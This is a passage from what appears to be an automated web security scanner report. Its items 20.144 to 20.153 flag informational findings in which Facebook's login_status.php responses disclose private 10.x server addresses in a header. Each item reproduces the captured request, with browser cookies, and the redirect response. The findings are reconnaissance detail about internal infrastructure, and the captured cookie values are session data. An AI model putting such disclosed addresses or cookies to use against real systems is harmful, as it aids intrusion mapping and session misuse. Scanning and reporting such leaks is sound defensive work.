Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1ac84726c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff14c209fd&relation=parent&transport=postmessage&frame=f5a2f5d4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.68.33
X-Cnection: close
Date: Thu, 05 May 2011 01:48:56 GMT
Content-Length: 0

20.144. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.104.49

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2df207e2c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1d34d522%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2c8c57658%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1d34d522%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df88c00b6c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df11e5fa634%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1d34d522%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df88c00b6c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df180e268e%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1d34d522%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df88c00b6c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df7d68e158%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1d34d522%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df88c00b6c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f180e268e&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1d34d522&relation=parent&transport=postmessage&frame=f88c00b6c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.104.49
X-Cnection: close
Date: Thu, 05 May 2011 02:13:52 GMT
Content-Length: 0

20.145. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.137.112

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df334a31b5c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff23a0be258%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df146768fcc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff23a0be258%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2faff4c4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3f2eab97c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff23a0be258%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2faff4c4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2cf8e976%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff23a0be258%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2faff4c4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1aafbdd8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff23a0be258%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2faff4c4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2cf8e976&origin=http%3A%2F%2Faol.sportingnews.com%2Ff23a0be258&relation=parent&transport=postmessage&frame=f2faff4c4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.137.112
X-Cnection: close
Date: Thu, 05 May 2011 01:12:27 GMT
Content-Length: 0

20.146. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.99.132

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2797cb52c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff101400a08%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f8847d6c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff101400a08%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20dbd20dc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f33a7a28%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff101400a08%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20dbd20dc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df16a89b1b%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff101400a08%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20dbd20dc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24b64d48%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff101400a08%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20dbd20dc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f16a89b1b&origin=http%3A%2F%2Faol.sportingnews.com%2Ff101400a08&relation=parent&transport=postmessage&frame=f20dbd20dc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.99.132
X-Cnection: close
Date: Thu, 05 May 2011 01:11:16 GMT
Content-Length: 0

20.147. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.99.33

Request

GET /extern/login_status.php?api_key=4d965afccc4d86c598dbf5d94fb34a7c&app_id=4d965afccc4d86c598dbf5d94fb34a7c&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d877e6fc%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff157f8d8cc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37a093e68%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff157f8d8cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1510b850%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37e50a17%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff157f8d8cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1510b850&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8cec36a8%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff157f8d8cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1510b850&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df85497aac%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff157f8d8cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1510b850&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f8cec36a8&origin=http%3A%2F%2Fwww.huffingtonpost.com%2Ff157f8d8cc&relation=parent&transport=postmessage&frame=f1510b850
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.99.33
X-Cnection: close
Date: Thu, 05 May 2011 00:58:29 GMT
Content-Length: 0

20.148. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.75.45

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df39e00980c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36efa557%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df182b0941%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36efa557%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb5fcd92c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df25432244%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36efa557%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb5fcd92c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3ee59b8cc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36efa557%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb5fcd92c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df392643228%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36efa557%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb5fcd92c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3ee59b8cc&origin=http%3A%2F%2Faol.sportingnews.com%2Ff36efa557&relation=parent&transport=postmessage&frame=fb5fcd92c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.75.45
X-Cnection: close
Date: Thu, 05 May 2011 00:58:14 GMT
Content-Length: 0

20.149. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.153.41

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2e3bc9dd%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff140aba3e%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df35e3b1404%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff140aba3e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d1cd54bc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3818e431%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff140aba3e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d1cd54bc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df7995381%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff140aba3e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d1cd54bc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df318074f84%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff140aba3e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d1cd54bc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f7995381&origin=http%3A%2F%2Faol.sportingnews.com%2Ff140aba3e&relation=parent&transport=postmessage&frame=f2d1cd54bc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.153.41
X-Cnection: close
Date: Thu, 05 May 2011 01:36:23 GMT
Content-Length: 0

20.150. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.139.130

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3a18eb0dc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc7e9566%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df7bee6804%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc7e9566%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13fc7349c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d82a929%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc7e9566%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13fc7349c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfdcc85d5c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc7e9566%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13fc7349c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df18609b7c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc7e9566%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13fc7349c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=fdcc85d5c&origin=http%3A%2F%2Faol.sportingnews.com%2Ffc7e9566&relation=parent&transport=postmessage&frame=f13fc7349c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.139.130
X-Cnection: close
Date: Thu, 05 May 2011 01:11:02 GMT
Content-Length: 0

20.151. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.105.110

Request

GET /extern/login_status.php?api_key=187288694643718&app_id=187288694643718&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23d3f18fc%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff399faa324%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d7714834%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff399faa324%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b2efe228%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df22ae28564%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff399faa324%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b2efe228&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df31ba05c14%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff399faa324%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b2efe228&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df18da12388%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff399faa324%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b2efe228&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f31ba05c14&origin=http%3A%2F%2Ftechcrunch.com%2Ff399faa324&relation=parent&transport=postmessage&frame=f2b2efe228
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.105.110
X-Cnection: close
Date: Thu, 05 May 2011 02:00:28 GMT
Content-Length: 0

20.152. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.42.55

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1ff374a8c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc2236fd%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df28c078fa%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc2236fd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df228c06be4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3244212b4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc2236fd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df228c06be4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3160d2048%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc2236fd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df228c06be4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9099c74%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc2236fd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df228c06be4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3160d2048&origin=http%3A%2F%2Faol.sportingnews.com%2Ffc2236fd&relation=parent&transport=postmessage&frame=f228c06be4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.42.55
X-Cnection: close
Date: Thu, 05 May 2011 01:20:54 GMT
Content-Length: 0

20.153. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.99.110

Request

